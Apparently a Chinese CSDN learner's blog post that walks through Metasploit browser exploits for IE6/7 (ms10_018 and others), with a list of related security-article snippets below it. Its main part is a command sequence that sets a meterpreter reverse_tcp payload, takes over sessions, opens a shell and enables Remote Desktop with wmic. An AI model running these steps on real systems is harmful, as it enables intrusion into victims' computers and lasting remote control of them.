从零开始学习kali-metasploit 7月23日

IE67漏洞利用实战
最新推荐文章于 2025-06-10 10:52:12 发布
原创 最新推荐文章于 2025-06-10 10:52:12 发布 · 347 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

                                                      kali

                                                                                                                                                            ---小白121的记录

介绍IE 6 7 的几个攻击漏洞

运用渗透工具:metasploit

 

metasploit

模块:

  • ms10_018
  • ms11_050
  • ms10_046

 

开启metasploit:

msfconsole

调用ms10_018模块:

msf > use exploit/windows/browser/ms10_018_ie_behaviors

加载反弹模块:

set payload windows/meterpreter/reverse_tcp

设置 LHOST SRVHOST 参数:

set LHOST IP
set SRVHOST IP

设置浏览器路径:

set URIPATH 路径

开启攻击:

exploit

查看反弹:

session -l

切换反弹:

session -i 序号

 

攻击成功

其他几个语法相同

 

进入Dos命令行:

shell

开启远程桌面:

wmic /node:%pcname% /USER:%pcaccount% PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

 有些需要输入密码所以会不成功

 

 

 

 

 

121812
关注
kali学习笔记篇(三)Metasploit初试炼
Kind&红衣的博客
08-11 572
exploit:利用漏洞 payload:攻击载荷 #进入msf控制台 msfconsole help查看帮助信息 show 显示攻击载荷 开始攻击 #装载攻击载荷选择windows系统模块/ms08_067漏洞 use exploit/windows/smb/ms08_067_netapi #查看选项 show options #选择目标 set RHOST targetIP #...
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 1301
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
kali学习手册
12-10
Security Testing, Penetration Testing, and Ethical Hacking
KaLi学习教程
11-14
KaLI技术中文教程,值得学习入门,想学习攻防技术或者CTF值得一看
【2025最新】Kali linux零基础学习教程(超详细),从下载、安装到使用,看这一篇就够了!
最新发布
kjuhfkicf154的博客
06-10 918
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
如何学习KALI
weixin_30246221的博客
09-22 346
比视频教程书籍更有效的办法(这些全没用) 就是在命令行中输入工具名称和 -h进行查询 转载于:https://www.cnblogs.com/iamjuruo/p/7470955.html
从零开始学习kali- 7月20
qq_42184699的博客
07-20 499
                                                      kali     目录 metasploit  nmap 获取指定ip开放端口 获取IP段活跃主机 command 命令行启动: 查看 查看设置 查看攻击模块 调用指定模块 攻击IP 反弹IP 将管理员密码获取(hash) 单词 metasploit ...
网络安全之路:我的系统性渗透测试学习框架
03-19 2160
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
219-6-3Google浏览器书签备份
qq_43046057的博客
06-03 3910
WAF 创建时间 2019-03-11 12:45:27 最后修改 2019-04-03 14:02:50>> 书签名称 链接 添加时间 WEB漏洞测试(二)——HTML注入 & XSS攻击 - 优快云博客 http://www.secsky.cn/216.html 2018-05-15 10:45:24 ModSecurity介绍 - 优快云博客...
[系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
杨秀璋的专栏
03-06 6897
前文分享了MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒,复现了WannaCry勒索病毒。这篇文章作者将继续分析WannaCry勒索病毒,主要通过IDA和OD逆向分析蠕虫传播部分,详细讲解蠕虫是如何感染传播的。同时,由于作者技术真的菜,只能叙述自己摸索的过程,如果存在错误或不足之处,还望告知。希望这篇基础性文章对您有所帮助~
[网络安全自学篇] 八十九.PE文件解析之通过Python获取时间戳
热门推荐
杨秀璋的专栏
07-23 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了基于机器学习的恶意代码检测技术,包括机器学习概述与算法举例、基于机器学习方法的恶意代码检测、机器学习算法在工业界的应用。这篇文章将尝试软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源,但也存在局限性。文章同时也普及了PE文件分析和APT溯源相关基础,基础性文章,希望对您有所帮助~
Kali msf教程
08-24
kali linux msf系列教程
kali学习之路
weixin_45092418的博客
11-05 1061
我的kali学习之路
Kali学习
七月_的博客
05-08 579
Kali在docker环境下搭建vulnhub靶场 下载、解压 wget https://github.com/vulhub/vulhub/archive/master.zip unzip ~ 复现Hadoop 未授权访问漏洞 配置环境 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d 访问http://your-ip:8088 即可看到Hadoop YARN ResourceManager WebUI页面 ...
Kali linux 自学心得
weixin_34194702的博客
01-02 2469
一.kali 安全***的一般测试 流程1.信息收集目标在线主机,域名信息,邮箱地址,常用密码,同网段信息,子域名信息,指纹信息,端口信息2.漏洞分析cisco工具集(cisoco工具)fuzzing工具集openvas开源评估软件扫描工具集数据库评估软件3.漏洞利用4.权限维持(创建一个后门)5.文档编辑二.谷歌***(goole hacker)1.通过互联网searchd...
kali学习
ndjnddjxn的博客
10-19 1163
NAT(网络地址转换)模式允许虚拟机通过宿主机的网络连接来访问外部网络。在这种模式下,宿主机相当于一个网关,虚拟机通过宿主机进行网络地址转换来访问外部网络。
一文通透——Kali Linux基础入门_kali linux 新手教程_kali linux jichurumen
2401_84970415的博客
05-13 2296
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
kali Linux简单版攻击WiFi(内附教程)
2301_77472496的博客
07-30 3330
kali Linux简单版攻击WiFi
kali学习
qq_43779485的博客
04-10 222
kali linux 学习 软件安装 APT包管理器 kali衍生于Debain ,并继承了APT包管理器 更新软件仓库的名录 apt update #安装任何软件之前必须先更新目录 下载软件包安装 apt full-upgrade 直到无可更新为止 出现任何问题,注意屏幕提示信息 安装DEB安装包 apt install ./… 安装中文字体 微软字体 apt install ttf-ms...
从零开始Kali Linux的详细安装与配置教程
本文档详细介绍了如何从头开始安装并配置Kali Linux,涵盖了安装前的准备工作、使用虚拟机软件配置Kali Linux、以及详细步骤说明。" 知识点详细说明: 1. Kali Linux概述: - Kali Linux是一个专为数字取证和渗透...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值